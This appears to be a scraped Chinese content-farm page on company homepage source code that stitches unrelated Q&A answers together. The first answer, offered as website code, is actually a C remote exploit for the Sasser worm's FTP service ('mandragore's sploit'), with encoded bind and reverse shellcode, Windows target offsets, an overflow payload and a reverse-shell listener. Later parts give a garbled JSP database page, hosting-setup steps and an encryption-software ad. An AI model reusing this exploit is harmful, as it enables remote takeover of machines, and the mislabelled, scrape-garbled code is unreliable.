当前位置:首页 > 代码 > 正文

公司主页源代码(开源公司网站代码)

admin 发布:2022-12-19 12:44 113


今天给各位分享公司主页源代码的知识,其中也会对开源公司网站代码进行解释,如果能碰巧解决你现在面临的问题,别忘了关注本站,现在开始吧!

本文目录一览:

急求一套公司用的源代码,只要有留言功能就可以,主页要漂亮点的

#include stdio.h

#include strings.h

#include signal.h

#include netinet/in.h

#include netdb.h

#define NORM "\033[00;00m"

#define GREEN "\033[01;32m"

#define YELL "\033[01;33m"

#define RED "\033[01;31m"

#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.3 for " RED "sasser.x" NORM

#define fatal(x) { perror(x); exit(1); }

#define default_port 5554

struct { char *os; long goreg; long gpa; long lla;}

targets[] = {

// { "os", go ebx or pop pop ret, GetProcAd ptr, LoadLib ptr },

{ "wXP SP1 all", 0x77C0BF21, 0x77be10CC, 0x77be10D0 },

{ "w2k SP4 all", 0x7801D081, 0x780320cc, 0x780320d0 },

}, tsz;

unsigned char bsh[]={

0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,

0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,

0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,

0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,

0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,

0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,

0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,

0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,

0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,

0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,

0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,

0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,

0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,

0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,

0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,

0xC8,0x21,0x0E

};

unsigned char rsh[]={

0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,

0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,

0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,

0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,

0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,

0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,

0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,

0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,

0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,

0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,

0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,

0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,

0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E

};

char verbose=0;

void setoff(long GPA, long LLA) {

int gpa=GPA^0xdededede, lla=LLA^0xdededede;

memcpy(bsh+0x1d,gpa,4);

memcpy(bsh+0x2e,lla,4);

memcpy(rsh+0x1d,gpa,4);

memcpy(rsh+0x2e,lla,4);

}

void usage(char *argv0) {

int i;

printf("%s -d host/ip [opts]\n\n",argv0);

printf("Options:\n");

printf(" -h undocumented\n");

printf(" -p port to connect to [default: %u]\n",default_port);

printf(" -s 'bind'/'rev' shellcode type [default: bind]\n");

printf(" -P port for the shellcode [default: 530]\n");

printf(" -H host/ip for the reverse shellcode\n");

printf(" -L setup the listener for the reverse shell\n");

printf(" -t target type [default 0]; choose below\n\n");

printf("Types:\n");

for(i = 0; i sizeof(targets)/sizeof(tsz); i++)

printf(" %d %s\t[0x%.8x]\n", i, targets.os, targets.goreg);

exit(1);

}

void shell(int s) {

char buff[4096];

int retval;

fd_set fds;

printf("[+] connected!\n\n");

for (;;) {

FD_ZERO(fds);

FD_SET(0,fds);

FD_SET(s,fds);

if (select(s+1, fds, NULL, NULL, NULL) 0)

fatal("[-] shell.select()");

if (FD_ISSET(0,fds)) {

if ((retval = read(1,buff,4096)) 1)

fatal("[-] shell.recv(stdin)");

send(s,buff,retval,0);

}

if (FD_ISSET(s,fds)) {

if ((retval = recv(s,buff,4096,0)) 1)

fatal("[-] shell.recv(socket)");

write(1,buff,retval);

}

}

}

void callback(short port) {

struct sockaddr_in sin;

int s,slen=16;

sin.sin_family = 2;

sin.sin_addr.s_addr = 0;

sin.sin_port = htons(port);

s=socket(2,1,6);

if ( bind(s,(struct sockaddr *)sin, 16) ) {

kill(getppid(),SIGKILL);

fatal("[-] shell.bind");

}

listen(s,1);

s=accept(s,(struct sockaddr *)sin,slen);

shell(s);

printf("crap\n");

}

int main(int argc, char **argv, char **env) {

struct sockaddr_in sin;

struct hostent *he;

char *host; int port=default_port;

char *Host; int Port=5300; char bindopt=1;

int i,s,pid=0,rip;

char *buff;

int type=0;

char *jmp[]=;

printf(BANNER "\n");

if (argc==1)

usage(argv[0]);

for (i=1;iargc;i+=2) {

if (strlen(argv) != 2)

usage(argv[0]);

switch(argv[1]) {

case 't':

type=atoi(argv[i+1]);

break;

case 'd':

host=argv[i+1];

break;

case 'p':

port=atoi(argv[i+1])?:default_port;

break;

case 's':

if (strstr(argv[i+1],"rev"))

bindopt=0;

break;

case 'H':

Host=argv[i+1];

break;

case 'P':

Port=atoi(argv[i+1])?:5300;

Port=Port ^ 0xdede;

Port=(Port 0xff) 8 | Port 8;

memcpy(bsh+0x57,Port,2);

memcpy(rsh+0x5a,Port,2);

Port=Port ^ 0xdede;

Port=(Port 0xff) 8 | Port 8;

break;

case 'L':

pid++; i--;

break;

case 'v':

verbose++; i--;

break;

case 'h':

usage(argv[0]);

default:

usage(argv[0]);

}

}

if (verbose)

printf("verbose!\n");

if ((he=gethostbyname(host))==NULL)

fatal("[-] gethostbyname()");

sin.sin_family = 2;

sin.sin_addr = *((struct in_addr *)he-h_addr_list[0]);

sin.sin_port = htons(port);

printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he-h_addr_list[0])),port);

if (bindopt)

printf("[.] will try to put a bindshell on port %d.\n",Port);

else {

if ((he=gethostbyname(Host))==NULL)

fatal("[-] gethostbyname() for -H");

rip=*((long *)he-h_addr_list[0]);

rip=rip^0xdededede;

memcpy(rsh+0x53,rip,4);

if (pid) {

printf("[.] setting up a listener on port %d.\n",Port);

pid=fork();

switch (pid) { case 0: callback(Port); }

} else

printf("[.] you should have a listener on %s:%d.\n",inet_ntoa(*((struct in_addr *)he-h_addr_list[0])),Port);

}

printf("[.] using type '%s'\n",targets[type].os);

// -------------------- core

s=socket(2,1,6);

if (connect(s,(struct sockaddr *)sin,16)!=0) {

if (pid) kill(pid,SIGKILL);

fatal("[-] connect()");

}

printf("[+] connected, sending exploit\n");

buff=(char *)malloc(4096);

bzero(buff,4096);

sprintf(buff,"USER x\n");

send(s,buff,strlen(buff),0);

recv(s,buff,4095,0);

sprintf(buff,"PASS x\n");

send(s,buff,strlen(buff),0);

recv(s,buff,4095,0);

memset(buff+0000,0x90,2000);

strncpy(buff,"PORT ",5);

strcat(buff,"\x0a");

memcpy(buff+272,jmp[0],2);

memcpy(buff+276,targets[type].goreg,4);

memcpy(buff+280,jmp[1],5);

setoff(targets[type].gpa, targets[type].lla);

if (bindopt)

memcpy(buff+300,bsh,strlen(bsh));

else

memcpy(buff+300,rsh,strlen(rsh));

send(s,buff,strlen(buff),0);

free(buff);

close(s);

// -------------------- end of core

if (bindopt) {

sin.sin_port = htons(Port);

sleep(1);

s=socket(2,1,6);

if (connect(s,(struct sockaddr *)sin,16)!=0)

fatal("[-] exploit most likely failed");

shell(s);

}

if (pid) wait(pid);

exit(0);

}

网站首页HTML代码在什么地方

在首页按ctrl+u,就可以看到源代码,如果你能进入网站ftp的话,就把网站根目录下的index.html,或者是index.php(index开头的就行)下载下来,这就是网站首页html代码

jsp 中网站的首页源代码

这是最简单的一个例子,数据库要你自己建,用的是ACCESS

%@ page contentType="text/html; charset=gb2312" language="java" import="java.sql.*" errorPage="" %

html

head

meta http-equiv="Content-Type" content="text/html; charset=gb2312"

titleJSP连接Access数据库/title

style type="text/css"

!--

.style1 {

font-size: 20px;

font-weight: bold;

}

--

/style

/headbody

div align="center" class="style1"JSP连接Access数据库/div

br

hr

p%

Class.forName("sun.jdbc.odbc.JdbcOdbcDriver"); //载入驱动程序类别

Connection con = DriverManager.getConnection("jdbc:odbc:jspdata"); //建立数据库链接,jspdata为ODBC数据源名称

//建立Statement对象

Statement stmt = con.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,

ResultSet.CONCUR_READ_ONLY);

ResultSet rs = stmt.executeQuery("select * from lyb"); //建立ResultSet(结果集)对象,并执行SQL语句

%

/p

p align="center"NUMB1数据表中记录如下/p

table width="640" border="1" align="center" bordercolor="#7188e0"

tr bgcolor="d1d1ff"

th width="49"编号/th

th width="90"姓名/th

th width="126"E-mail/th

th width="221"网站/th

th width="80"QQ/th

/tr

%

while(rs.next())

{

%

tr bgcolor="#f8f8f8"

th%= rs.getString(1) %/th

th%= rs.getString(2) %/th

th%= rs.getString(3) %/th

th bgcolor="#f6f6f8"%= rs.getString(4) %/th

th%= rs.getString(5) %/th

/tr

%

}

rs.close();

stmt.close();

con.close();

%

/table

p align="center"br

如果您能看到表格中的数据,说明连接数据库成功!/p

/body

/html

如何建立公司的主页!要那种WWW.XXX.com就能打开的

建立公司的主页具体操作如下:

1.首先,在浏览器上输入万网官网,进入,在首页的域名查询界面查询自己想要注册的域名是否已被使用,如已被使用只能换用其他的域名进行注册,选中一个自己喜欢的域名后进行购买即可;

2.购买存放网站的空间;

3.购买付款后,你将得到你所购买的虚拟主机的控制面板,里面包含了后台参数,包括FTP上传地址、账号、密码,以及数据库的地址,账号密码等,后期上传程序导入数据库时会使用到。还有网站的关闭开启,php版本、绑定域名等等;

4.把数据库开启/新建下,并设置下相关的参数,这里主要包括账号密码,数据库名称;

5.接下来是自己的网站程序,如果你是企业,或者公司可以找第三方服务公司给你建设一个满足你要求的网站或者门户站,如果是个人站的话,可以从网上找些开源的网站源码,如dedecms、wordpress(更适合个人博客型的站点)、eschop、NCshop(基于商城类的源码)在这里给大家推荐一个好的源码网站,里面包含了很多免费的网站程序源码,可以直接拿过来用的;

6.找到自己喜欢类型的程序源码,如方维o2o程序,进入文章后在文章的底端有相应的安装方法步骤,点击下载链接即可把程序源码下载到你的本地上;

7.上传程序到您所购买的服务器空间上,这里利用FlashFTP软件上传,上传连参数可从虚拟主机控制面板中查看;

8.利用FlashFTP上传程序最好的理由是它支持断点续传;

9.如果有相关的数据库需要导入到数据库服务器里,那就用navicat软件,连接后选择“运行SQL文件”来将数据导入到数据库,大家可以看到当双击数据库时数据库呈现绿色,代表此数据库已连接上,方可对其进行操作;

10.到此时,可以说你的网站已经搭建起来了,输入你的虚拟主机上的三级域名就可以看到你的网站模样,最后一步,域名的绑定,你买了一个域名后,进入域名的相关控制面板界面,选择解析到你的三级域名;

11.然后再在虚拟主机的控制面板中,选择“域名绑定”进入域名绑定界面后输入你所购买的那个域名,点击“添加绑定”即可。

怎样查看网页源代码

工具/原材料

IE8浏览器、电脑。

1、打开电脑在桌面上找到并点击IE8浏览器,IE7浏览器的操作也是类似步骤;

2、点击进入浏览器主页以后,选择并点击你要查看网页源代码的网站,这里以新华网为例;

3、点击进入新华网以后,在任意的空白部位点击鼠标右键,在下拉选项中选择“查看源”;

4、点击选择查看源以后,在最右边的标记的红色框中就是网页的源代码。

首页源代码有“加密”字样是什么意思

就是被加密软件加密保护了呗,如果你要打开首先你要有权限,不然就需要提前揭秘,否则即使你私自带走源代码也打不开的。

我们公司用IP-guard和虚拟桌面来保护源文件,IP-guard的加密功能支持各种格式的源代码,可以对源代码进行自动加密保护,无需手动操作,不影响既有的操作习惯。

被IP-guard加密保护的源代码,适用于内部流通、外发、员工出差、服务器上传和下载等常见场景。

公司主页源代码的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于开源公司网站代码、公司主页源代码的信息别忘了在本站进行查找喔。

版权说明:如非注明,本站文章均为 AH站长 原创,转载请注明出处和附带本文链接;

本文地址:http://ahzz.com.cn/post/8295.html


取消回复欢迎 发表评论:

分享到

温馨提示

下载成功了么?或者链接失效了?

联系我们反馈

立即下载